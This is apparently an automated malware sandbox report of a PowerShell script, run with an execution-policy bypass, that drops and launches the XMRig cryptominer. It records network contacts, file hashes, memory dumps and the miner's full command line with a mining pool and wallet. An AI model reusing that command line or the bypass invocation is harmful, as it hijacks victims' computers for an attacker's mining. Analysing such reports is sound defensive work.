US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 200.64.52.20.in-addr.arpa udp

Files

memory/2156-0-0x00007FFCDBF83000-0x00007FFCDBF85000-memory.dmp

memory/2156-1-0x0000015540E70000-0x0000015540E92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vemzk220.a10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2156-11-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-12-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-13-0x00007FFCDBF83000-0x00007FFCDBF85000-memory.dmp

memory/2156-14-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-16-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2156-18-0x0000015541360000-0x000001554136A000-memory.dmp

memory/2156-17-0x0000015541370000-0x0000015541382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2892-49-0x0000016F81900000-0x0000016F81920000-memory.dmp

memory/2892-51-0x0000016F83200000-0x0000016F83220000-memory.dmp

memory/2892-50-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-52-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-53-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-56-0x0000016F83240000-0x0000016F83260000-memory.dmp

memory/2892-55-0x0000016F83220000-0x0000016F83240000-memory.dmp

memory/2156-54-0x00007FFCDBF80000-0x00007FFCDCA41000-memory.dmp

memory/2892-57-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-58-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-59-0x0000016F83220000-0x0000016F83240000-memory.dmp

memory/2892-60-0x0000016F83240000-0x0000016F83260000-memory.dmp

memory/2892-61-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-62-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-63-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-64-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-65-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-66-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-67-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-68-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-69-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-70-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-71-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-72-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-73-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-74-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-75-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-76-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-77-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-78-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-79-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-80-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-81-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-82-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-83-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-84-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-85-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-86-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-87-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-88-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-89-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-90-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-91-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-92-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-93-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-94-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-95-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-96-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-97-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-98-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-99-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-100-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-101-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-102-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-103-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-104-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-105-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-106-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-107-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-108-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-109-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-110-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-111-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-112-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-113-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-114-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-115-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-116-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-117-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

memory/2892-118-0x00007FF6D9CE0000-0x00007FF6DA913000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/3092-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

memory/3092-9-0x00000197F59A0000-0x00000197F59C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dy4gwjpz.0mn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3092-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/3092-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/3092-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/3092-14-0x00000197F5C30000-0x00000197F5C42000-memory.dmp

memory/3092-15-0x00000197F5C10000-0x00000197F5C1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3108-46-0x000001F54B6B0000-0x000001F54B6D0000-memory.dmp

memory/3108-47-0x000001F54CE20000-0x000001F54CE40000-memory.dmp

memory/3108-48-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3092-50-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

memory/3108-49-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3092-51-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/3108-53-0x000001F54CE60000-0x000001F54CE80000-memory.dmp

memory/3108-52-0x000001F54CE40000-0x000001F54CE60000-memory.dmp

memory/3092-54-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/3108-55-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-56-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-58-0x000001F54CE60000-0x000001F54CE80000-memory.dmp

memory/3108-57-0x000001F54CE40000-0x000001F54CE60000-memory.dmp

memory/3108-59-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-60-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-61-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-62-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-63-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-64-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-65-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-66-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-67-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-68-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-69-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-70-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-71-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-72-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-73-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-74-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-75-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-76-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-77-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-78-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-79-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-80-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-81-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-82-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-83-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-84-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-85-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-86-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-87-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-88-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-89-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-90-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-91-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-92-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-93-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-94-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-95-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-96-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-97-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-98-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-99-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-100-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-101-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-102-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-103-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-104-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-105-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-106-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-107-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-108-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-109-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-110-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-111-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-112-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-113-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-114-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-115-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-116-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

memory/3108-117-0x00007FF6B2090000-0x00007FF6B2CC3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240426-en

Max time kernel

1794s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/248-0-0x00007FFDFEE33000-0x00007FFDFEE35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zc2zx15s.ngf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/248-6-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/248-7-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/248-11-0x00000129273E0000-0x0000012927402000-memory.dmp

memory/248-12-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/248-13-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/248-14-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/248-16-0x0000012927650000-0x0000012927662000-memory.dmp

memory/248-17-0x0000012927640000-0x000001292764A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2548-48-0x0000015637550000-0x0000015637570000-memory.dmp

memory/2548-49-0x0000015638D50000-0x0000015638D70000-memory.dmp

memory/2548-50-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-52-0x0000015638D90000-0x0000015638DB0000-memory.dmp

memory/2548-51-0x0000015638D70000-0x0000015638D90000-memory.dmp

memory/2548-53-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-54-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-55-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-57-0x0000015638D90000-0x0000015638DB0000-memory.dmp

memory/2548-56-0x0000015638D70000-0x0000015638D90000-memory.dmp

memory/2548-58-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-59-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-60-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-61-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-62-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-63-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-64-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-65-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-66-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-67-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-68-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-69-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-70-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-71-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-72-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-73-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-74-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-75-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-76-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-77-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-78-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-79-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-80-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-81-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-82-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-83-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-84-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-85-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-86-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-87-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-88-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-89-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-90-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-91-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-92-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-93-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-94-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-95-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-96-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-97-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-98-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-99-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-100-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-101-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-102-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-103-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-104-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-105-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-106-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-107-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-108-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-109-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-110-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-111-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-112-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-113-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

